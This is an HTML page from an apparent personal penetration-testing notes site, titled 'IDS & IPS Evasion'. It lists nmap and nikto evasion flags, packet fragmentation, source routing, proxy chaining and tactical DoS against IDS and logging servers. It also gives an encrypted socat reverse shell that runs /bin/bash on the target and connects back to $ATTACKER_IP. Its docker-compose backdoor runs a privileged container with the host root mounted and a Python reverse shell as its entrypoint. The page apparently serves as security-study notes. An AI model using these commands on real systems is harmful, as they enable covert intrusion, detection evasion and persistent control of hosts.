<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>The Real Hugo</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">Husk</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" 
><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" ><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs/meltdown.html">meltdown</a></li></ul></details><details id=binaries ontoggle="linkClick(this); return false;" ><summary>Binaries</summary><ul><li><a href="/exploit/binaries/Shellcode.html">Shellcode</a></li><li><a href="/exploit/binaries/aslr.html">aslr</a></li><details id=buffer_overflow ontoggle="linkClick(this); return false;" ><summary>Buffer_overflow</summary><ul><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/exploit/binaries/buffer_overflow/docs/amd64.html">amd64</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/amd64_instructions.html">amd64_instructions</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/buffer_overflow.html">buffer_overflow</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/cut_stack_in_half.html">cut_stack_in_half</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/pwntools_specifics.html">pwntools_specifics</a></li><li><a href="/exploit/binaries/buffer_overflow/docs/ret_address_reuse.html">ret_address_reuse</a></li></ul></details><li><a 
href="/exploit/binaries/buffer_overflow/ropping.html">ropping</a></li></ul></details><details id=canary_bypass ontoggle="l
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#ids-ips-evation">IDS &amp; IPS Evasion</a><ul>
<li><a href="#enumeration">Enumeration</a><ul>
<li><a href="#nmap">nmap</a></li>
<li><a href="#nikto">nikto</a></li>
</ul>
</li>
<li><a href="#protocol-manipulation">Protocol Manipulation</a><ul>
<li><a href="#relying-on-another-protocol">Relying on another protocol</a></li>
<li><a href="#manipulation-of-the-sources-or-lhosts-network-port">Manipulation of the source's or LHOST's network port</a></li>
<li><a href="#session-splicing-by-fragmentation-and-segmentation">Session splicing by fragmentation and segmentation</a></li>
<li><a href="#sending-invalid-packets">Sending invalid packets</a></li>
</ul>
</li>
<li><a href="#payload-manipulation">Payload Manipulation</a><ul>
<li><a href="#obfuscation-and-encoding">Obfuscation and Encoding</a></li>
<li><a href="#encrypting-communication-channels">Encrypting Communication Channels</a></li>
<li><a href="#modification-of-data">Modification of Data</a></li>
</ul>
</li>
<li><a href="#route-manipulation">Route Manipulation</a><ul>
<li><a href="#relying-on-source-routing">Relying on Source Routing</a></li>
<li><a href="#using-proxyy-servers">Using Proxy Servers</a></li>
</ul>
</li>
<li><a href="#tactical-dos">Tactical DoS</a></li>
<li><a href="#misc">MISC</a></li>
<li><a href="#backdoors">Backdoors</a><ul>
<li><a href="#docker">Docker</a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<h1 id="ids-ips-evation">IDS &amp; IPS Evasion</h1>
<ul>
<li>Evasion by manipulation of <ul>
<li>Tool parameters</li>
<li>Protocol</li>
<li>Payload</li>
<li>Route</li>
<li>Or DoS</li>
</ul>
</li>
</ul>
<h2 id="enumeration">Enumeration</h2>
<ul>
<li><a href="https://developers.whatismybrowser.com/useragents/explore/">User-Agents</a></li>
</ul>
<h3 id="nmap">nmap</h3>
<ul>
<li><code>--script-args http.useragent="&lt;user-agent&gt;"</code></li>
<li><code>-sS</code> half-open (SYN) scan</li>
</ul>
<h3 id="nikto">nikto</h3>
<ul>
<li><code>-useragent &lt;user-agent&gt;</code></li>
<li>Tuning <code>-T 1 2 3</code></li>
<li><strong>NOT</strong> <code>-evasion &lt;encoding-technique&gt;</code>, it increases detection</li>
</ul>
<h2 id="protocol-manipulation">Protocol Manipulation</h2>
<h3 id="relying-on-another-protocol">Relying on another protocol</h3>
<ul>
<li><code>nc -ulvnp 4711</code> to listen for incoming UDP traffic</li>
<li><code>nc -u $TARGET_IP $TARGET_PORT</code> for connecting through UDP</li>
</ul>
<h3 id="manipulation-of-the-sources-or-lhosts-network-port">Manipulation of the source's or LHOST's network port</h3>
<ul>
<li><code>nmap -g 80</code> or <code>nmap --source-port 53</code> to send outgoing nmap traffic through it</li>
</ul>
<h3 id="session-splicing-by-fragmentation-and-segmentation">Session splicing by fragmentation and segmentation</h3>
<ul>
<li><code>nmap</code> fragmentation in 8 bytes <code>-f</code>, 16 bytes <code>-ff</code>, <code>--mtu &lt;size&gt;</code> for MTU </li>
<li>Use <a href="https://www.monkey.org/~dugsong/fragroute/">Fragroute</a> with <code>ip_frag &lt;num&gt;</code> in <code>fragroute.conf</code>, then use <code>fragroute -f fragroute.conf $TARGET_IP</code></li>
</ul>
<h3 id="sending-invalid-packets">Sending invalid packets</h3>
<ul>
<li>Invalid protocol header flags and checksums via <code>nmap --badsum</code>, <code>nmap --scanflags URG/ACK/PSH/RST/SYN/FIN</code>, e.g. concatenation of multiple flags <code>nmap --scanflags SYNRSTFIN</code></li>
<li><code>hping3</code> including <code>--ttl</code>, <code>--badsum</code>, header flags <code>-S</code>,<code>-A</code>,<code>-P</code>,<code>-U</code>,<code>-F</code>,<code>-R</code></li>
</ul>
<h2 id="payload-manipulation">Payload Manipulation</h2>
<h3 id="obfuscation-and-encoding">Obfuscation and Encoding</h3>
<ul>
<li>Base64 </li>
<li>URL</li>
<li>Escaped Unicode Characters</li>
</ul>
<h3 id="encrypting-communication-channels">Encrypting Communication Channels</h3>
<ul>
<li>Use socat with encryption </li>
</ul>
<div class="codehilite"><pre><span></span><code>openssl req -x509 -newkey rsa:2048 -days <span class="m">356</span> -subj <span class="s1">&#39;/CN=www.example.com/O=YO/C=FR&#39;</span> -nodes -keyout id_rsa.key -out reverse.crt
</code></pre></div>
<ul>
<li>Create <code>.pem</code> (Privacy Enhanced Mail) file via</li>
</ul>
<div class="codehilite"><pre><span></span><code>cat id_rsa.key reverse.crt &gt; reverse.pem
</code></pre></div>
<ul>
<li>Listening on attacker side</li>
</ul>
<div class="codehilite"><pre><span></span><code>socat -d -d OPENSSL-LISTEN:4711,cert<span class="o">=</span>reverse.pem,verify<span class="o">=</span><span class="m">0</span>,fork STDOUT
</code></pre></div>
<ul>
<li>On target </li>
</ul>
<div class="codehilite"><pre><span></span><code>socat OPENSSL:<span class="nv">$ATTACKER_IP</span>:4711,verify<span class="o">=</span><span class="m">0</span> EXEC:/bin/bash
</code></pre></div>
<h3 id="modification-of-data">Modification of Data</h3>
<ul>
<li>Order of parameters, instead of <code>nc -lvnp</code> it is <code>nc -vpnl</code></li>
<li>Adding whitespaces to the commands</li>
<li>Use aliases</li>
</ul>
<h2 id="route-manipulation">Route Manipulation</h2>
<h3 id="relying-on-source-routing">Relying on Source Routing</h3>
<ul>
<li><code>nmap --ip-options "L 10.10.20.30 10.10.30.40"</code> routes through these IPs loosely</li>
<li><code>nmap --ip-options "S 10.10.20.30 10.10.30.40"</code> routes through the IPs strictly</li>
</ul>
<h3 id="using-proxyy-servers">Using Proxy Servers</h3>
<ul>
<li><code>nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP</code></li>
</ul>
<h2 id="tactical-dos">Tactical DoS</h2>
<ul>
<li>Non-malicious, benign traffic against <ul>
<li>IDS/IPS</li>
<li>Logging server</li>
</ul>
</li>
</ul>
<h2 id="misc">MISC</h2>
<ul>
<li>Changing <ul>
<li><code>User-Agent</code></li>
<li>Request frequency and duration of sleep </li>
<li>SSL/TLS certs</li>
<li>DNS beacon, storing exfiltrated data in the query</li>
</ul>
</li>
</ul>
<h2 id="backdoors">Backdoors</h2>
<ul>
<li>Backdooring without getting recognized by the IDS/IPS by reading its rules in the config file</li>
</ul>
<h3 id="docker">Docker</h3>
<ul>
<li>Create a <code>docker-compose.yaml</code> file with a reverse shell as an entry point, mount the host volume to <code>/mnt</code> inside the container</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nn">---</span><span class="w"></span>
<span class="nt">version</span><span class="p">:</span><span class="w"> </span><span class="s">&quot;2.1&quot;</span><span class="w"></span>
<span class="nt">services</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="nt">backdoorservice</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="nt">restart</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">always</span><span class="w"></span>
<span class="w"> </span><span class="nt">image</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">&lt;Found image&gt;</span><span class="w"></span>
<span class="w"> </span><span class="nt">entrypoint</span><span class="p">:</span><span class="w"> </span><span class="p p-Indicator">&gt;</span><span class="w"> </span>
<span class="w"> </span><span class="no">python -c &#39;import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</span><span class="w"></span>
<span class="w"> </span><span class="no">s.connect((&quot;&lt;$ATTACKER_IP&gt;&quot;,4711));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);</span><span class="w"></span>
<span class="w"> </span><span class="no">pty.spawn(&quot;/bin/sh&quot;)&#39;</span><span class="w"></span>
<span class="w"> </span><span class="nt">volumes</span><span class="p">:</span><span class="w"></span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">/:/mnt</span><span class="w"></span>
<span class="w"> </span><span class="nt">privileged</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">true</span><span class="w"></span>
</code></pre></div>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
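/**
 * Persist the open/closed state of a sidebar <details> element in
 * sessionStorage, keyed by the element's id, so it can be re-opened on the
 * next page load. Called from the inline ontoggle handlers in the sidebar.
 *
 * NOTE: the sidebar reuses some ids for several <details> elements (e.g.
 * `docs`), so a saved key can only ever be restored onto the first match.
 *
 * @param {HTMLDetailsElement} obj - the toggled <details> element.
 * @returns {undefined}
 */
function linkClick(obj) {
  // Without an id there is nothing to key the state on; storing under the
  // empty key would also make the restore loop look up a non-existent element.
  if (!obj || !obj.id) {
    return;
  }
  if (obj.open) {
    // setItem overwrites any previous value, so no separate removeItem is needed.
    sessionStorage.setItem(obj.id, "open");
  } else {
    sessionStorage.removeItem(obj.id);
  }
}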
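// On page load, re-open every sidebar <details> whose id was saved by
// linkClick. A stored key with no matching element (a stale entry, or an id
// that only exists on another page) is skipped; previously it made
// getElementById return null and the assignment threw a TypeError, which
// aborted the loop and left all remaining entries unrestored.
let _keys = Object.keys(sessionStorage);
for (const _key of _keys) {
  const _details = document.getElementById(_key);
  if (_details) {
    _details.open = true;
  }
}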
</script>
<script async src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>